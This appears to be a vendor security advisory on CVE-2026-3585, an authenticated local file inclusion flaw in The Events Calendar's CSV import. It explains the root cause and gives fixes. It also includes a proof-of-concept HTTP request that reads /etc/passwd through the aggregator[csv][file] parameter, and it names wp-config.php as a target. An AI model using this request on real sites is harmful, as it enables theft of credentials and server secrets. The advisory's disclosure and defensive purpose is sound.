CVE-2026-3585 affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path where a low privilege user who can manage event imports can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Even though this does not look like code execution, the security impact is serious because it turns an editorial role into a tool for reading sensitive server files that were never meant to be exposed through the application. Given the plugin’s large install base around 700k plus, this becomes especially relevant on multi author sites and organizations where event staff have elevated content permissions but should not have access to server level secrets.
| CVE | CVE-2026-3585 |
| Plugin Version | The Events Calendar <= 6.15.17 |
| All Time | 80 233 333 |
| Active installations | 700 000+ |
| Publicly Published | March 9, 2026 |
| Last Updated | March 9, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3585 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar/the-events-calendar-61517-authenticated-author-arbitrary-file-read-via-ajax-create-import https://t.me/cleantalk_researches/382 |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| March 3, 2026 | Plugin testing and vulnerability detection in the The Event Calendar have been completed |
| March 3, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 8, 2026 | Registered CVE-2026-3585 |
Discovery of the Vulnerability
The vulnerable behavior sits in the Event Aggregator AJAX import flow. A user controlled value in aggregator[csv][file] is accepted by the import creation handler and persisted into the import record metadata as a file path without enforcing a safe directory allow list. The server then resolves the path with realpath and proceeds to open it via the CSV reader using SplFileObject. The critical mistake is that realpath only canonicalizes the path, it does not enforce that the file belongs to an approved directory such as uploads or a dedicated import folder. As a result, a path like /etc/passwd or another readable local file can be treated as a source file for import processing, which is the essence of path based authorization failure in file handling code.
Understanding of LFI attack’s
Local File Inclusion issues in WordPress plugins are often high severity because WordPress deployments keep sensitive data in predictable locations. A classic target is wp-config.php which can expose database credentials and authentication salts, and on many hosts additional secrets are present in environment files, debug logs, or deployment artifacts. Even system files like /etc/passwd can be valuable because they reveal usernames and service accounts that help attackers tailor later exploitation. In shared hosting and container deployments, the directory structure often contains neighboring app configs, backups, or mounted secrets. When a plugin lets an authenticated user open arbitrary readable paths, it can become a stepping stone from a simple author account to full compromise through credential theft. This is why LFI is not just information disclosure. It frequently becomes a pivot into database access and account takeover.
Exploiting the LFI Vulnerability
To exploit CVE-2026-3585, an attacker with Author+ cookies:
POC:
Go to http://138.124.55.33/wp-admin/edit.php?post_type=tribe_events&page=aggregator and grep "tribe_aggregator_nonce" nonce POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 138.124.55.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://138.124.55.33/wp-admin/edit.php?post_type=tribe_events&page=aggregator Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 194 Origin: http://138.124.55.33 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: AUTHOR+ action=tribe_aggregator_create_import&tribe_aggregator_nonce=431f15e9b5&aggregator[origin]=csv&aggregator[csv][content_type]=tribe_events&aggregator[csv][file]=/etc/passwd&aggregator[action]=new____
The most damaging outcome is disclosure of configuration and secret material that enables follow on compromise. If an attacker can read WordPress config or environment secrets, they can pivot to database extraction, credential reuse, and long term persistence. On sites with staging and production on the same host, directory enumeration and file reads can expose deployment pipelines, API keys, and backups. For organizations that run events at scale, a compromised author account is realistic through phishing or credential reuse, and this bug would convert that foothold into server level intelligence. The risk is amplified because the import feature is often enabled for operational convenience, and admins may grant event editors broader permissions than they realize. This makes the vulnerability a practical target for quiet credential theft rather than noisy defacement.
Recommendations for Improved Security
The correct fix is strict path policy. The importer must enforce that the CSV file path resides only within an approved directory, typically uploads or a dedicated aggregator import directory, using realpath on both the candidate path and the base directory and then performing a prefix check. Any absolute path outside the allowed base must be rejected before the import record is created. It is also important to disallow direct filesystem paths entirely and require uploads through WordPress media handling, storing only attachment IDs rather than paths. On the authorization side, access to the aggregator import endpoints should be restricted to trusted roles only, and nonces should be validated as request integrity controls but not treated as authorization. As an operational mitigation, site owners should review which roles can access Event Aggregator, disable CSV import if it is not needed, and rotate secrets if there is any suspicion of exposure, especially database credentials and API keys.
By taking proactive measures to address LFI like CVE-2026-3585 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #LFI #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.